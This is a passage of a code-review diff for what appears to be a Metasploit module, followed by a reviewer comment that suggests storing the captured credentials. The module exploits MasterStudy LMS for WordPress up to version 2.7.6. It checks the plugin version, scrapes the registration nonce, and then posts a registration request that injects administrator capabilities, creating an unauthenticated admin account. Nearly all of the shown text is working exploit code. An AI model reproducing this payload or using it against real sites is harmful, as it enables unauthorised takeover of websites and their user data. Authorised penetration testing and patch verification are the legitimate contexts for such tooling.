modules/auxiliary/admin/http/wp_masterstudy_privesc.rb

```diff
@@ -0,0 +1,123 @@
+          'Reliability' => []
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'Username to register (blank will auto generate)', '']),
+        OptString.new('PASSWORD', [false, 'Password (blank will auto generate)', '']),
+        OptString.new('EMAIL', [false, 'Email to register (blank will auto generate)', ''])
+      ]
+    )
+  end
+
+  def check
+    unless wordpress_and_online?
+      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
+    end
+
+    checkcode = check_plugin_version_from_readme('masterstudy-lms-learning-management-system', '2.7.6')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      return Msf::Exploit::CheckCode::Safe('MasterStudy LMS version not vulnerable')
+    end
+
+    checkcode
+  end
+
+  def get_username
+    datastore['USERNAME'] == '' ? "#{Rex::Text.rand_text_alpha_lower(8..10)}#{Rex::Text.rand_text_numeric(0..2)}" : datastore['USERNAME']
+  end
+
+  def get_password
+    datastore['PASSWORD'] == '' ? Rex::Text.rand_password : datastore['PASSWORD']
+  end
+
+  def get_email
+    datastore['EMAIL'] == '' ? Rex::Text.rand_mail_address : datastore['EMAIL']
+  end
+
+  def run
+    username = get_username
+    password = get_password
+    email = get_email
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path))
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response') unless res.code == 200
+    /"stm_lms_register":"(?<nonce>\w{10})"/ =~ res.body
+    fail_with(Failure::UnexpectedReply, 'Unabled to retrieve MasterStudy Nonce from page') if nonce.nil?
+
+    print_status("Attempting with username: #{username} password: #{password} email: #{email}")
+    json_post_data = JSON.pretty_generate({
+      'user_login' => username,
+      'user_email' => email,
+      'user_password' => password,
+      'user_password_re' => password,
+      'become_instructor' => '',
+      'privacy_policy' => true,
+      'degree' => '',
+      'expertize' => '',
+      'auditory' => '',
+      'additional' => [],
+      'additional_instructors' => [],
+      'profile_default_fields_for_register' => {
+        'wp_capabilities' => {
+          'value' => { 'administrator' => 1 }
+        }
+      }
+    })
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+      'ctype' => 'application/json',
+      'vars_get' => {
+        'action' => 'stm_lms_register',
+        'nonce' => nonce
+      },
+      'data' => json_post_data
+    )
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response') unless res.code == 200
+    results = res.get_json_document
+    if results['status'] == 'success'
+      print_good('Account Created Successfully')
```

Comment:
If the account is created successfully, it might be useful to save the creds to the database for later usage.